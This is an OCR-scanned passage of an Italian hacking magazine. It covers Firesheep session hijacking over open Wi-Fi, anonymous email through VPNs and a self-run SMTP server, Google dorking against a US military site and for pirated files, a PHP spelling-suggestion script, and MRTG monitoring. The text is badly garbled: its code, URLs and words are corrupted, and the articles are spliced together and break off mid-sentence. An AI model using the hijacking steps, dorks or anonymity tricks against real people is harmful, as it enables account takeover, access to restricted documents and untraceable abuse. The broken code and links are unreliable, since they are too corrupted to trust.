Ora non ci resta che collegarci dal nostro 
browser a "IccalhosT. 
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intrapresa nel corso di questo articolo 
vedremo come attivarla a livello gbbale 
dal momento che stiamo configurando 
il sen/er per lavorare su un solo dominio. 
Considereremo inoltre una capacità 
massima di Uptoad della linea pari a 
2Mbps. Edisiamo nuovamente il file 
7eto/apache2/sites-enab!Bd/000- 
default" inserendo all'inferno del blocco 
<VirtualHost> le seguenti direttive, che 
commenteremo subfto: 




Nella recente edizione 
del ToorCon, una 
convention di e per 
hacker dedicala alla 
sicurezza informatica 
svoltasi a San Diego, 
c'è stato un interessante intervento 
di Eric Butler. Eric ria infatti 
dimostrato concretamente come 
grazie a un hijacking via Wi-Fi un 
attaccante sia in grado di prendere il 
controllo delia sessione di un utente 
dopo che Questi abbia effettuato 
fl login o si sia autenticato su un 
server, fino ad arrivare a conoscere 
iasua password. Eric in particolare 



si è concentrato sulle sessioni 
generate dai principali siti "social" 
del momento tra cui Facebook e 
Twliter, risultati tutti vulnerabili 
all'attacco. Non a caso quindi il 
talk aveva il provocatorio titolo 
"Hey Web 2.0: Start protecting user 
privacy instead of pretending to' 
(Hey Web £.0: inizia a proteggere 
davvero la privacy dell'utente invece 
di far finta). 

Vediamo come è poss/Ma cne ciò 
accada. 

Il cuore del problema è costituito, 
come spesso accade, dalla 
concomitanza di diversi aspetti 



che impattano sulla sicurezza. Il 
primo di questi fattori è costituito 
da una rete wireless non protetta, 
attraverso cui la vittima decide di 
collegarsi a internet e da lì (secondo 
fattore) decide di accedere a uno 
dei social network vulnerabili. Essi 
infatti non applicano una protezione 
sulle comunicazioni successive 
all'autenticazione, prestando- il 
fianco quindi a possibili attacchi. 
Per rendersi conto di cosa stiamo 
parlando non è necessario essere 
particolarmente abili, perche 
grazie a un plugir per Firefox 
chiamato Firesheep (open-source 
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s disponibile per Windows, Linux è 
MacQSX) abbiamo sostanzialmente 
armato già il nostro browser a 
intercettare dati che non dovrebbero 
esserci resi disponibili, ma che al 
contrario sono trasmessi in chiaro. 
Firesheep agisce in pratica da 
sniffer, dato che è in grado di 
intercettare i cookie dell'utente 
vittima che si trovi nello stesso 
network wireless cui è collegato 
l'attaccante, rendendo disponibili 
tutte te connessioni Http e Https 
associate. Il vero problema intatti 
è Che (a falla persiste anche con fé 
connessioni Https, perché solo II 
iogin è cifrato mentre il resto della 
comunicazione resta non criptata, 



SIMULAZIONE 
D ' ATTA C C □ 



Per fare un test abbiamo bisogno 
di poche cose: una rete Wi-Fi nella 
quale fare i test. 
Winpeao (winpcap.org) 
Firesheep (Http://github.conn/ 
downloads/codebutler/firesheep/ 
firesheep-0,1 -1 .xpi) e ovviamente 
Firefox. 

Prima dì tutto installiamo VVinpcap, 
Poi installiamo Firesheep e dopo 
aver riavviato Firefox possiamo 
avviarlo dal menu View -> Side bar 
-> Firesheep (tasti scorciatoia 
SHIFT+CTRL+S). 
Clicchiamo nella parte bassa sul 
pulsante delle preferenze e nel 
primo foglio del menu che ci si apre, 
impostiamo la scheda df rete Wi-Fi 
da utilizzare in modalità promiscua. 



Colleghiamoci alla rete Wi-Fi e 
poi clicchiamo sul pulsante "Start 
capturing" aspettando che i dati 
comincino ad arrivare. 




(/ pulsante in basso permette di 
selezionare la scheda di rete Wi-Fi i 
utilizzata per lo sniffino. 



Selezionata la scheda Wi-Fi e connessi 
alla rete di test siamo pronti per partire 
con l'intercettazione dei cookie. 

Dopo un po' avremo i dati di sessioni 
pre-autenticate: cliccandoci sopra 
saranno aperte direttamente nel nostro 
browser. Immaginiamo quindi cosa 
può succedere in un aeroporto o 
internet caffè.,. 



CONTROMISURE 



Il protocollo Https non può essere 
la soluzione del problema e nei 
casi menzionati ci SÌ deve rivolgere 
necessariamente a servizi VPN quando 
si accede a dati sensibili tramite rete 
di accesso pubblico Wj-Fì. Cercando 
su google si possono trovare diversi 
servizi gratuiti e anche a pagamento. 
Se vogliamo risolvere in economia, è 
possibile installare un proprio server 
SSH, anche su Windows tramite 
Cygwin e utilizzare un client SSH 
come Putty per accedervi, mentre il 
browser può essere configurato per 
utilizzare ia connessione socket del 
proxy e da li accedere ai sito web 
desiderato. 



Ecco ori esempio di seme si presenta 
il pannello di Firesheep topo che ha 
intercettato diversi cookie, tra cui 
Google, Facebook, Tmtter e Flickr e si è 
aperto li link versa Facehook. 



Parlando poi dell'accesso Wi-Fi, è 
Chiaro che vanno prese delle minime 
precauzioni anche da chi ne gestisce 
l'accesso: se anche si stabilisce che 
il servizio deve poter essere libero 
per tutti i fruitori, è bene comunque 
aggiungere una password di 
connessione per gli utenti autorizzati. 
L'Ideale sarebbe poi che fosse 
utilizzata una protezione più forte, 
come WPA2, 

Lato client, per gli utenti di Firefox è 
già disponibile un plugìn che sembra 
possa rappresentare una possibile 
risposta al perìcolo di essere "dirottati" 
da attaccanti dotati di Firesheep: si 
Chiama Force-TLS (Http://forcetls. 
sidstamm.com) e forza il client ad 
accettare solo connessioni sicure 
verso i server cui Ci Stiamo collegando. 
E' disponibile anche una modalità 
debug Che ci permette di visualizzare 
tutte le comunicazioni Che intercorrono 
durante l'autenticazione e le 
successive transazioni. Per abilitarla è 
sufficiente seguire questi step: 
apriamo about:config impostiamo la 
preferenza extensions.foroetls@si rj , 
stamm. debug al valore "true" 



RI AVVIAM □ 
FIREFDX 



Ho scritto "sembra" dato che 
alcuni utilizzatori hanno rilevato 
comunque del problemi. Un'altra 
possibile soluzione potrebbe essere 
rappresentata da HTTPS Everywhere 
(https://www.eff.org/https-everywhere) 
che però è tuttora in beta e non offre 
ancora garanzie certe nei confronti di 
Firesheep. 

Nell'attesa che sia quindi ufficializzata 
una adeguata contromisura 
all'hijacking possibile con Firesheep 
è bene evitare di connettersi a social 
network da posti di accesso pubblico 
Wi-Fi. In generale la rete cui ci 
connettiamo va comunque considerata 
insìcura e dopo Firesheep sono 
comparsi altri tool realizzati al solo 
scopo dì ricordarcelo, come Idiocy 
(httpsy/gfthub.com/Jonty/ldiocy/bfob/ 
master/idiocy.pv) che in neanche 130 
linee in Python realizza il dirottamento 
di un account Twitter scrivendo un twit 
al posto nostro. 



di Riccardo MeggiatQ 
redaziofl&®hackBrjournaì,it 
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NO, FOSSE, QUASI 




Sono in molti a riempirsi 
la bocca di belle parole 
sull'anonimato della 
posta elettronica, Beata 
incoscienza. Uno pensa 
che basti creare un 
account fasullo su Gmail per poter 
imbrattare i forum o, peggio (o meglio, 
dipende dai punti di vista), inviare 
allegati contenenti matware, senza 
essere beccato. Qualcun altro, un 
pelo più furbo, ricorre ai servizi di invio 
"anonimo", dove quelle simpatiche 
virgoletti indicano che Si tratta di un 
anonimato un po' farlocco. L'anonimato 
assoluto, quando si invia una e-mail, 
è difficile da ottenere, ma scendendo 
a qualche compromesso possiamo 
rendere molto difficile risalire al mittente. 
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Diciamocelo: a meno che non si tratti di 
faccende top-secret come nemmeno 
ne abbiamo viste con Wikileaks, 
difficilmente qualcuno si prenderà la 
briga di inseguirci da un punto all'altro 
del mappamondo digitale. 
Anche se siamo ricercati. 
Prima, perà, vediamo cosa succede 
quando inviamo una normalissima 
e-mail. Semplificando il discorso ai 
minimi termini umani, il messaggio 
è trasmesso e preso in carico da 
un server di posta, che si occupa 
dell'invio al destinatario, In questo 
processo, il server conosce 
perfettamente il nostro indirizzo IP, 
spesso trasmettendolo cosi com'è o, 
in altri casi, mascherandolo. Resta il 
fatto che se un destinatario ha delle 




valide ragioni per farlo, può sfruttare 
la Legge per andare direttamente al 
sodo, cioè da chi gestisce il server di 
posta, e chiedergli di sputare il rospo. 
Risalendo all'indirizzo IP del mittente 
e, quindi, a noi. Ahia. Molti ser/izi di 
anonimizzatzlone di email tentano di 
sopperire al problema rendendo II 
server difficile da individuare. A volte 
sfruttano dei proxy, rimbalzando il 
messaggio tra più server sparsi per 
il globo. In altre, puntano a un unico 
server, ma locato in paesi non molto 
collaborativi con le legislazioni del resto 
dei mondo. Di solito si trarla di qualche 
lontano paese esotico, quindi la scusa 
di andare a vedere se il server della 
posta funziona è sempre buona 
per fare una vacanza al caldo. :-) 






Il servizio Untati? fiori al gsru/itiifcii l'anonimato. Però, utilizzandolo tramite vita 
VP&, è davvero mito diffìcile essere smascherati. 



DAL FACILE 
AL DIFFICILE 



Scherzi a parte, dunque, viene 
spontaneo pensare che un servizio 
di anonimizzazione della posta offra 
un buon livello di anonimato. È cosi? 
La risposta è "dipende dal servizio", 
in virtù di quanto detto. Uno dei più 
diffusi e semplici dei momento è 
Akapost (www.akapost.com}. 
Si tratta di un servizio di forward 
che, di fatto-, cambia l'indirizzo del 
mittente con uno ad hoc (scelto 
dall'utente), in modo die sia questo a 
comparire al destinatario. Funziona, è 
gratuito ma le condizioni contrattuali 
negano utilizzi "nocivi™. Il fatto che il 
gestore Sia californiano, comunque, 
e già un primo, discreto, deterrente 

I ad azioni legali di stampo europeo. 

' A un servizio come Akapost se ne 
affiancano altri di simili, per i quali 
è meglio dare un'occhiaia alio 
condizioni contrattuali e, soprattutto, 
alla locazione. Un deciso passo in 
avanti lo sì fa sfruttando dei servizi 
di VPN. E in questo caso ce ne sono 
pochi capaci di battere l'efficienza di 
Hotspot Shield (www.hotspostshield. 
corn). Questo software gratuito 
è in grado di creare una Virtual 
Private Network pronta a rendere 
imperscrutabili le transazioni web 
dei nostri dati. E qui viene ìi bello; 
Hotspot Shield diventa una comoda 
base sulla quale poggiare tutte le 
nostre scorribande tramite posta 
elettronica. Il trucco, in realtà, è 
semplice: il problema delle caselle 



di posta elettronica farlocche, create 
ad hoc per rimanere anonimi, è che 
ci identificano tramite un indirizzo IP, 
Sfruttando un software come Hotspot 
Shield, invece, il nostro internet 
Protocol è mascherato tramite HTTPS, 
dando fio da torcere a chi vuole 
arrivare alla nostra identità. Va da sé 
che basta installare Hotspost Shield, 
e quindi creare una casella di posta 
elettronica web, per gestire in modo 
sufficientemente anonimo le nostre 
e-mail. Posto che, ovviamente, anche 
queste devono essere scritte e gestite 
con la VPN bella che attivata, 



VPN E SMTP 

SERVER, 
CHE COPPIA! 

mciiiiiiniuiiiraiiuaiuiiflniiiiiHiiHnrjHnnn 

L'utilizzo dì Hotspost Shield, per altro, 
apre le porte ad altri utilizzi. Uno dei 
più ricorrenti, quando Si vogliono 
inviare emaii anonimi, è di crearsi 
un proprio SMTP Server, Infatti, 
se questo server è il primo snodo 
identificabile per un destinatario 
deciso a rintracciarci, mascherandolo 
tramite una VPN la nostra identità 
rimane protetta in modo efficace. In 
questo caso, dopo aver installato e 
attivato Hotspot Shield, passiamo 
alla Creazione di un SMTP Sen/er nel 
nostro computer. Non è difficile: QK 
SMTP Server è uno dei programmi 
migliori nel genere e ripaga 
ampiamente I 25,52 euro necessari 
per l'acquisto (e comunque è 
disponibile una versione dimostrativa 
gratuita, valida per 30 giorni). 



E PER LA PD STA 
IN RICEZIONE? 



Negli ultimi tempi si è sviluppato 
un grande interesse attorno ai 
servizi di posta elettronica a 
tempo, in particolare su 10 Minute 
Mail (raggiungìbile all'indirizzo 
vflww.10minutemail.com). Si tratta 
però di servizi validi per la ricezione di 
posta, anche se gli indirizzi possono 
essere sfruttati come "maschere", 
in fase di trasmissione. Il concetto, 
in questo caso, è semplice: un 
servizio ohe crea Indirizzi email 
temporanei, della durata di appena 10 
minuti. Il tempo di mandare qualche 
messaggio utilizzando questo 
indirizzo e zzzot.., viene eliminato. 
Risalire af mittente originario diventa 
molto, molto difficile. Ad accalorare il 
senso di riservatezza offerto dal sito, 
ci sono delle condizioni di privacy 
che garantiscono che non e registrato 
alcun log delle attività svolte sulle 
sue pagine. Siamo liberi di crederci 
o meno ma, in caso contrario, basta 
utilizzare un proxy o una VPN mentre 
si visita il sito e il gioco è fatto. 
Insomma, magari per l'anonimato 
assoluto serve qualche sforzo in 
più, ma già con qualche rapido clic 
si ottiene un'invisibilità informatica 
difficile da smascherare. Con tanti 
grazie da parte della nostra privacy, 




Hotspot Shield s'installa in pochi 
secondi e crea una VPN sicura e pronta 
ail "anonimizzare" tatti i servìzi web. 
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Con una VPN e QK SMTP Server 
possiamo creare gli indirizzi e-mail 
desiderati e spedire tutti i messaggi 
che vogliamo, con un buon 
compromesso tra semplicità d'utilizzo 
e livello raggiunto dall'anonimato. 




cliMikka 
reciszi 



ANCHE I SITI 



PIÙ PROTETTI 



PPESPNO FARE 




SCIVDLDNI 
IN FATTO DI 
SICUREZZA. 
VEDIAMD IL 
CAFFI DI UN SITO 
STATUNITENSE 
FjFfnRETISBlMD E 
IMPENETRABILE. 



u 



La notizia è subito 
rimbalzata da Twitter: 
quando si visita il sito 
militare di aepbus 
all'indirizzo https:// 
aepubs.army.inil/ 
compare prima un invito a lasciare 
il sito perché giudicato poco 
sicuro e poi un divieto di accesso. 



I sito militare nega Fsecesso se non si il 
ksg-in, ma teste una ricetta eonfoogle per 
a L'ere a otSjJKSKMw i suoi documenti. 



Per poter accedere è necessaria 
un'autorizzazione che la maggior 
parte dei comuni mortali non ha. 
Ma, sorpresa delle sorprese, basta 
tare una ricerca con Googie usando 
come chiave di ricerca site:aepubs, 
army.mil per poter accedere a 
moltissimi documenti, in formato pdf 
nella maggior parte dei casi, e per 
maggiore "sicurezza" di non perderci 
nulla è addirittura disponibile la cache 
consultabile a piacimento. Grazie 
airelenoo dei risultati di Google è 
anche possibile visitare con agio 
diverse aree dell'impenetrabile Sito. 
Come mai è potuta succedere una 
cosa simile? Con ottima probabilità il 
sito ha fatto ricorso all'indicizzazione 
di Google e così tantissimi documenti 
delicati finiscono tranquillamente 
nella nutritissima pagina dei risultati 
accessibili da chiunque, In casi come 
questi a volte Si parla di attacchi 
basati su Google. Se proviamo a fare 
la ricerca speciale e non vediamo piti 



niente, probabilmente i responsabili h 
della sicurezza del sito hanno 
(finalménte) posto rimedio alla loro 
piccola falla di sicurezza. La notizia 
è stata data su Twitter da Mikko 
Hypponen, direttore dei laboratori 
di ricerca di F-Secure il colosso 
finlandese in campo di antivirus. 



GLI ATTACCHI 
G □ □ ELE BASED 



Il principio è semplice a ne abbiamo 
sotto gli occhi un esempio pratico 
con il sito di aepubs.army.mil che 
e solo l'ultimo esempio illustre: la 
cronaca americana è costellata di 
annunci riguardanti la fuga di notizie 
riservatissime a causa del cattivo uso 
di programmi e strumenti Informatici 
fatte da dipendenti distratti o da 
tecnici incompetenti, La tecnica è 
quella di usare il celebre motore 



£esn che saccetteusantio l'inrlitìzs^one di Coogie. fflalgxido gli 
stingenti messi Hfmto per rendere maccessitiiie il s'io ai più, 
motte pznins e documenti sono accessibili a tutti. 



ISsp^We^MigastLGooglfsHaeksimemessoa 
disposizione direttamente dalia sesone programmi ili Soogk ed è 
disponibile per Windows, Linux e Mae, 



di ricerca per trovare documenti 
altrimenti inaccessibili. I documenti 
possono essere sottoposti a restrizioni 
per diversi motivi: o perché il sito che 
ci interessa richiede di fare uri log-in 
con un account che non abbiamo, 
oppure limita l'accesso solo a un'area 
geografica e blocca il nostro IP se non 
facciamo parte di quell'area, Per fare 
queste ricerche particolari dobbiamo 
usare la semplice sintassi richiesta 
dai comandi speciali di Google. Per 
cercare le pagine indicizzate per 
esempio, non dobbiamo fare una 
semplice ricerca che ci restituirebbe 
solo la pagina principale del sito che 
abbiamo inserito e l'elenco di pagine 
che ne pariamo, ma dobbiamo usare 
il comando site prima di scrivere 
l'indirizzo del sito. Possiamo fare 
questo esperimento con qualsiasi sito, 
Con un po' di pazienza potremmo 



avere tante piacevoli sorprese,.. 



□ □ □ OLE HACKS 



Questo utilissimo Strumento ci 
permette di usare dei comandi 
semplici per cercare contenuti 
particolari in Rete. Lo scopo dichiarato 
dello strumento, legale, malgrado 
il nome un po' curioso, è quello di 
fornire Strumenti per usare in modo 
semplice 1 comandi di Google per 
fare ricerche fruttuose e scovare 
vulnerabilità 0 usi impropri dei server, 
Per esempio se usiamo le funzioni per 
cercare libri, musica o video, invece 
di scrivere un comando dalla sintassi 
complicata come -inurl:(htm|html|php) 
imitle: "index of +"last modified" 
+"parent directory" +description 



+size +(.mp3|.wrna|.ogg} "titolo della 
canzone o nome del cantante' ci 
basta Scrivere il titolo o il nome del 
cantante, fare clic sul tipo di file che 
ci interessa e poi su Search. Grazie ai 
potenti strumenti di indiciszazione di 
Google potremmo trovare una miriade 
di file protetti da copyright e saremo 
in grado di individuare a colpo sicuro i 
server che distribuiscono illegalmente 
file protetti. È possibile scaricare II 
programma nella versione più adatta 
al nostro computer collegandoci 
all' indirizzo http://code.300gle.eom/p/ 
googlehacks/downloads/list. Per 
avere un'idea di come Google possa 
essere uno strumento pericoloso, 
grazie alla sua efficienza, diamo 
un'occhiata anche all'indirizzo www. 
hacteersforcharity.org/ghdb. Troviamo 
un esaustivo elenco delle Chiavi di 
ricerca utilizzate. Con i relativi risultati. 















nome del cornane 





1* 



enuto o l'indirizzo del sito che ci interessa controllare tramile Google, Sì scrivono direttamente nella casella di rlcer 
URL Per ottenere retorico della pagine indicizzate di un sito 

URL Per vedere la Usta delle pagine indicizzate da Google che contengono un link al sito che ci interessa. 

alllntext: parola o espressione. Restituisce l'elenco delle pagine indicizzate da Google che contengono le par 
abbiamo Indicato all'interno del testo. 

aliintitle:paro!a 0 espressione. Fornisce la lista delle pagine Indicizzate da Google che contengono delle determinati 
parole all'Interno del titolo. 






DI LEVHSMTEM 



Imptementlams !S forse 




INTERNET 

L'ALGORITMO 
DI RICERCA 
DELLA PAROLA 
IPOTETICAMENTE 
CORRETTA SI 
BASA SULLA 
DISTANZA DI 
LEVENSHTEIN, 
VEDIAMO COME 
FUNZIONA. 



■ I "forse cercavi" di Google è una 
I funzionalità della ricerca molto 
I comoda nel caso di "errori" di 
I battitura o semplice djbbio. 
I Vediamo come riprodurla per le 
ricerche dei nostri siti. L'algoritmo di 
ricerca della parala ipoteticamente 
cannetta si basa sulla distanza di 
Levenshtein anche nota come 'Edit 
Distance'. 



LA DISTANZA DI 
LEVENSHTEIN 



La distanza di Levenshtein è il nume- 
ra eli modifiche elementari necessarie 
per trasformare una stringa A in B. 
Le modifiche sorto: 
Sostituzione di un carattere 
Cancellazione di un carattere 
Aggiunta di un carattere 
Mettiamo caso che nella nostra ricer- 
ca scrivessimo erroneamente linxu. 
Per trasformare iinxu" in "linux" 



sono necessarie n modifiche. Que- 
sta n è la distanza di Levenshtein. 

La distanza quindi sarà 
Levenshteinflinxu 1 ,' I i nux") 
Minore è il numero che esprime que- 
sta distanza maggiore sarà l'ettlnen- 
ia tra. le parole. 

Per far funzionare il tutto abbiamo 
bisogno di un enorme dizionario 
italiano: ne ho estrapolato uno ab- 
bastanza completo eseguendo un 
merge' di diversi dizionari, 
(I problema è che dovremmo esegui- 
re il test per ogni parola presente nel 
dizionario. Il che diventerebbe molto 
pesante poiché, avendo circa 145000 
parole, ci sarebbero 1 45000 distanze 
da calcolare. 

La soluzione consiste nel l'effettuare 
un primo filtro nella selezione delle 
parole; quindi utilizzare un database 
(nel nostro caso MySQL) per estrarre 
solo le parole che hanno una lun- 
ghezza pari alla parola cercata s un 
valore numerico a nostro piacimento, 



per esempio 1, 

Quindi estrapoleremo dal database 

- nel caso di Iinxu = 5 char (caratteri) 

- tutte le parole che hanno lunghezza 
di 4,5,6 e le confronteremo con la 
distanza di Levenshtein, 

Per velocizzare ulteriormente l'estra- 
zione dal dizionario indicizziamo i 
campi "parola" e "lunghezza parola". 



IL NOSTRO 
DIZIONARIO 



Il nostro dizionario è composto da 

143770 parole, I campi del database 

sono organizzati così: 

N_REC_!D - Progressivo del record 

C_PAHOLA - Parola 

N_CHBLEN - intero che rappresenta 

la lunghezza della parola 

E' disponibile un dump del database 

con le 143770 parale al seguente 

indirizzo ( Oltre al SOL è in CSVJXT 

e XLS): 
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http://www.guido8975.ri/index. 
php?ctg=6&id=67 

ATTO PRATICO 

Questo script si basa su 3 file: 
conf.php 

Solito file di configurazione e con- 
nessione al database 
ricercaphp 
File della ricerca 
proc.php 
File dell'algoritmo 

FILE CDNF.PHP 

<?php 

Sser?er="locaIhost" ; 

5usar_n="root" ; 

$pas£word="passwor<j" ; 

ScU3_narae»"<3izionario" ; 

Sconnessione » roysgl_ 
connect ($server , $user_n, 
Spassvord) 

or die ("Connessione non 
riuscita: " . mysql_er- 
«r<) ) ; 

nysql^s e lectdb ( $db_ 
naave, Sconnessione) 

or die {"Errore nella 
se lei ione del database."); 
?> 

File ricerca. php 

La parola 9 inserita,in questa pa- 
gina a scopo illustrativo in una 
variabile SrRic a Cui possiamo 
assegnare invece di 'linxu' i dati 
provenienti da un POST con S_ 
POSTI'nomecampopOSt'] . 
<?php 

include ' proc . php ' ; 
5rRic = trim{ 'linxu') j 
if (!empfey($rRiC)) { 
SrRicRes - *"j 



SrRicArr ■ esplode (" 
*, SrRic); 

foreach (SrRicArr as 

fd) { 

SrRieRes .= 
LevWord(?j ) , » *i 

} 

SrRicRas ■ Substr_ 
r eplace {SrRìcKes ,",-l7; 

> .V. il. 

if (SrRieRes <> SrRic) { 
echo "Forse cercavi: ".SrRi- 
eRes ; } 

//Ricerca vostro aito 
//Cui aggiungerete la 
parte di codice per effet- 
tuare la ricerca nel vostro 
sito. 
?>' 

File prdc.php 

Qui è presente la funzione che calco- 
la la distanza dì Levenshtein. Modi- 
ficando la variabile SrSrcDis, che di 
default è a 1 , possiamo aumentare lo 
spettro di ricerca della parola nel db. 
Maggiore è il numero maggiore sarà 
lo spettro di ricerca. 
<?php 
function 

Le vWor d ( S Scci rchPo stUord ) ( 

include ' conf . php ' ; 

SrSrcDis ■ ' 1 ' ; 

SSearchPostWordien = 
strlen(SSearchJ£"ostWord) j 

$Ouery_rch = "SELECT * 
FROM italiano WHERE N_CHRLEH 
in ( " . ( SSearchPo stWordLen 
SrSrcDis) . " , " . SsearehPostWor 
dLen.-, » . (SScarchFostWordLen 
+Sr£rcDis) . ") *; 

$result__tch » nsysql_ 
query($query_rca, Sconnes- 



sione) ; 

SrWordLevDst « -1; 
while($row_rch ■ mysgl_ 
fetch_array (Sresult_rch) ) { 

SrLevDst = lave 
nshtein(strtolavrer (SSearcap 
ostWord), strtolower($row_ 
rchf 'C_PARQLA'] ) ) ; 

if($ELevDst = 

OJ { 

SrWord » 
Srowrcn [ ' C_PAROLA' ] ; 

SrWordLevDst 

= 0; 

broahf 

> 

elseif (SrWordLevDst < 0 j | 
SrLevDst <= SrWordLevDst) { 

SrWord = 
S row_rch [ 1 C^PAROLfl ' J ; 

SrWordLevDst 

■ SrLevDst; 



if ( ! empty ( SrLevDst) ) { 
return SrWord; }else{ return 
SSearchPostWord; } 

mysql^closec ) ! 

> 



□ □NCLUSiDNE 



L'esempio completo è disponibile sul 
sito http ://www.guido8975.it/index. 
php?ctg=6&id=&7 .Dove sono dispo- 
nibili sorgenti e dump del database. 
I sorgenti scaricabili sono anche 
cummentati, Un esempio dei funzio- 
namento è implementato in http;// 
www.geek-blog.it/ nella ricerca. 
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TI ROUTER 



TRAFFIC GRAPHER 




UN OTTI M □ STRUMENTO 
PER M DN ITP RARE IL 
TRAFFICO IN RETE. 



Per tenere sotto controllo una o più macchine remote, il mondo open- 
source mette a disposizione tantissimo software. Il più semplice da 
usare e da configurare è, senza ombra di duobio, MRTG (http^/oss.oe- 
tiker.ch/mrtg) iniziamo col dire che sono indispensabili alcune librerie 
ed alcuni programmi: 

* [net-analyaer/Efit-snsRpJ 

* Emedia-Iibs/libgd] 

* [nat-analyzer/mrtg] 

* [sys-apps/dcron] 

Opzionalmente possiamo anche visualizzare remotamente fe statisti- 
che avvalendoci di un server web come Mini_httpd 
<http^Awww,acme,com/software/mini_httpd/> o Apache <http://www. 
apache.org>. Vorrei faceste attenzione durante il copia ed incolla dei 
seguenti comandi. Dato che molti sono sensibili ai cosiddetti "line feed 
error", specie quelli che cominciano con: 
"Vbin/cat -s >/foo/baT Ricordo inoltre che ad ogni /biiVcat -s, vanno 
premuti contemporaneamente i tasti: [otri] e il tasto [rfl. 
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Cominciamo! 

Con i permessi di amministratore di sistema (0 superuten- 
te} creiamo te directory necessarie 

$au - 

Password: # Digitate la password di am- 

ministratore 
$nikdir /etc/mrtg 
$mkdir /atc/cran.mrtg 
fmkdir /Tar /www/ localhost /mrtg 

Create le directory possiamo cominciare a configurare il 
nostro file di configurazione snmpd.conf: 

$/bìn/cat -s > I et c/ sinici / snnrpd . con£ 
crassee locai 127.0.0.1/32 public 
cotósec locai 10.10.10.0/24 public 

group MyROGroup vi locai 
group MyROGroup v2c locai 
grówp MyROGroup usta locai 





qualcosa come: 7iisr/local/etc/rc.d/$nmpd.5h start* Perciò 
accertatevi sul come avviare i servizi del vostro GNU/ 
Linux o BSD (o system V) che sìa, e continuate la lettura. 
Accertatevi anche che il patti perii file MIB-txt sia corrcttO- 
Anìvati a questo punto dobbiamocominciare a configurare 
i vari servizi cric vorremmo monitorare. 
Primo fra tutti, il traffico generato. Lanciamo quindi il co- 
mando: 

/usr/bin/cfgitiaker \ 

— output* /etc/mrtg/ traffic.cfg \ 

— ìfdesc^ip \ 

--i£ref=descr \ 

— global "WorW)ir: /var/www/ localhost /mxtg" \ 
--global "Optiooat_.il bits r growright" \ 
public£localhost 

In questo modo il comando cfgmaker creerà un file chia- 
mato Vetc/mrtg/trafric .cfg" che conterrà tutte le informa- 
zioni perii pollino, $nmp del traffico di rete. Occupiamoci 
ora della CPU 



viow ali ineluded .1 * 
80 

access MyROGroup «"Y nc-auth ■» 

exact ali none none 
syslocation MyLocation 
syseontact Me 

Se avete fatto un copia/incolla, ora dovreste premere con- 
temporaneamente i tasti [Ctrf]+[d], così da interrompere 
I-inserimento dei caratteri. Infatti, cat -s, attende un vostro 
"segnale™ prima di procedere con la "concatenazione" fi- 
nale dell'informazione. Se preferite incollare solo lo script, 
tralasciatelo :) Questo file consentirà di impostare il servizio 
snmpd secondo le nostre esigenze, ed evitare di permet- 
tere l'accesso in lettura alle persone non addette ai lavrorì. 
Ricordo inoltre che snmpd è altamente configuratole, e che 
un man snmpd risponderà ad ogni vostra ulteriore doman- 
da. Ora occupiamoci de! file/etc/conf.d/snmpd aggiun- 
gendo la riga: 

-c /etc/Kffliip/Ennipd.ccjnt 

alla variabile: 'SNMPD FLAGÈ* Dovrebbe quindi risultare 
qualcosa come questo: 

SNMPD FLAGS="-C /otc/Bufltp/snnipd.eonf" 

Ora facciamo partire il servizio 'snmpd*: 

/etc/iait.d/snnipd start 

/sbìn/rc -update add snmpd dofault 

Questa sintassi può variare da distribuzione a distribu- 
zione. In questo caso ho utilizzato la sintassi di GNU/ 
Linux Gentoo <:h^:f/www-gerrtoo.org/>. Se invece avessi 
utilizzato la sintassi GNU/Linux Slackvi/are <http://www. 
slackware.com/?, avrei dovuto usare Vetc/rc.d/rc.snmpd 
start*. Se fossimo in ambiente BSD, avremmo dovuto usare 



/bin/cat -s > /etc/rartg/cpu.cfg 

WorltDir: /var/www/lQcaJ,bost/mrfcg 

LwdMiBs : /usr / share/ snrap /mibs/UCD- Semp -MIB . -■ 

fcxt 

Target [ localhost . epu] i ssCpuRawUser . -» 
OdssCpuR awU ser . 0 : pubi ioSlocalnost 
+ SsCpuRawSystem . O&asCpuRawSystein . 
O:publìc01ocalhost+ssCpuR»wNic«. ■> 
O&ssCpuRawNic i s.O:public@localhost 
Routetìjptime [ localhost. epu] ! publicSlocalhost 
MaxBytes [localhost. epu] ! ltJO 
Titlo [localhost .epu] : ero Load 
PageTop [localhost. epu] : <Hl>Actiws CPU 
LoadVc /Hl> 

Bnscaled[ localhost. epu] = yrnwd 
Shortl*gend[loea.lhost.cpu] : % 
YLegand[localiost.cpii] : CPU Btilization. 
Legendl [localhost. epu] : Aetìve CPU in % Load) 
legencU [localhost . epu] : 
Legend3 [localhost. epu] : 
Légand4 [localhost. epu] i 
Legendl [localhost . opu] : Actira 
LegendQElocalhont.cpuJ : 

Opt ions [ localhost . epu ] : growr ight , noperceiit 
Premiamo come poco fa i tasti Iclrtj+M, e passiamo alla 



/bin/cat -S > /etc/mrtg/mem.cfg 
LoadmBs : /usr/share/5imp/mibs/H0ST--i 
RESOIIRCES-MIB . txt 

Target [localhost. mem] : .1.3.6.1.4.1.2021.4.1-' 

.Oi.l.3.fi.l.4.1.2O21.4-ll.O:public01ocalhost 

PageTop [ localhost. iiifim] : <Hl>Frea Memory </Sl> 

WorkDir; /var/www/ localhost /mrtg 

OptionB [localhost .meni] : nopercent.growright, t 

gaug£ , noinf o 

Title [localhost. mejn] : Free Memory 
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-iu-Bytes [localhost. mera] : 1000000 
WK^localhost.mem] : k,M,G,T,P,X 
Tl^gendt localhost .mem] : bytes 
ShortLegcoiiflocalhost.iMsni] : bytas 
LegendI[looiLhost.BieBil: Free Memory: 
I^endO E localhost. meta] : 

I^geiuil [ localhost. -r-em] : Free memoxy, not •> 
including swap, in bytas 

Di nuovo [ctrt|+[d]. La memoria swap: 

/bìa/cat -e > /etc/rartg/swap.cfg 
LoacBDBs : /ust/sharQ/snnii)/iiiiba/l)CIl--> 
SXMP-MIB.tict 

Target [localhost . swap J : momAvailSwap. -> 

Otaf>mfl.TailSwap. 0 rpublicl&localhoEt 

PageTop [localhost. swap] : <Hl>Swap Heroory</Hl> 

WorkDir: /var/www/localhost/tìirtg' 

O^t ionsl localhost. swap] : nopercent, a 

iglit, gauge, noinf o 
Tit le [localhost. swap]: Free Memory 
HìKBytes [localhost. swap] : 1000000 
kHG[localhost.swap] : fc,M,G,T,P,X 

-■r.-ìnd E localhost. swap] i bytes 
ShortLegend[ localhost . swap] : bytes 
Legendl [ localhost . swap] : Free Memory : 
Agendo [ localhost . swapl : 
Legendl ( localhost. swap] : Swap memory "■ 
avail, in bytes 

E 5 consueto [Gtrrj+[d]. Veniamo ora ad uri classico del mo- 
nitoraggio: il pìng! Questo comodo tool ci permetterà dì sa- 
